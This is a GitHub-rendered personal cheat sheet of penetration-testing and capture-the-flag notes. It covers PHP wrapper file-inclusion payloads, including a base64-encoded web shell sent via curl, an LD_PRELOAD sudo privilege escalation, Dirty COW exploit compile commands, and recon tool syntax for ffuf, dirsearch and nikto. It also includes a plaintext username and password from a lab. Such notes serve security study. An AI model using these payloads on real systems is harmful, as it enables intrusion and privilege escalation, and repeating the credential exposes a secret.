-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathAddtosite
114 lines (66 loc) · 2.6 KB
/
Addtosite
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
creating our own ls :
- cp /usr/bin/ls newls
creating our own chmod:
- cat /usr/bin/chmod > chmodnew
giving a file perm:
chmodnew +x no_permissions.py
using it to run a file which had no perms for user:
- ./chmodnew +x no_permissions.py
Directory Traversal:
on windows check the: C:\Windows\System32\drivers\etc\hosts
PHP Wrappers:
php://filter = displays
example: we find a page called admin.php
page=php://filter/convert.base64-encode/resource=admin.php
php://data = executes
example:
page=data://text/plain,<?php%20echo%20system('ls');?>"
you can even url encode this (or base64)
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
----------------------
add tosite:
1. how to use bloodhound and neo4j with sharphound (using winrm to download upload etc) on the site
2. ffuf usage and other tools - autorecon, linux exploiter suggester
3. pspy
4. grab the id_rsa private key - and then chmod 600
------
sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility (in the CTf, this was the program which has root perms without password
may need to do from kali box, and ensure it is run from /home directores not .tmp
https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
"Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
==============================
compile a .c file
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
compiling a c file to exectuable:
gcc -pthread 40839.c -o dirty_cow2
compile a c file and if you get a crypt error use:
gcc -pthread dirty.c -o dirty -lcrypt
==========================
========================================================
=====================================
===================================================================================================
Tool use:
compile a .c file
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
compiling a c file to exectuable:
gcc -pthread 40839.c -o dirty_cow2
compile a c file and if you get a crypt error use:
gcc -pthread dirty.c -o dirty -lcrypt
-----
use big.txt when scanning
base types: 32,58,64
nmap -min-rate
nikto:
nikto -h http://
----------------------
curl -L - list directories from webserver
curl -s - is silent option
---
ffuf usage
ffuf -u http://example.com/FUZZ -w words.txt -e php -mc 200,301 (extension search)
dirsearch -u <url> -w <wordlist> --full-url --suffix=. -r -R2
dirsearch - usethis
-r = resursive
-R2 = after two redirectons stop
--full-url = show full url
--suffix=.php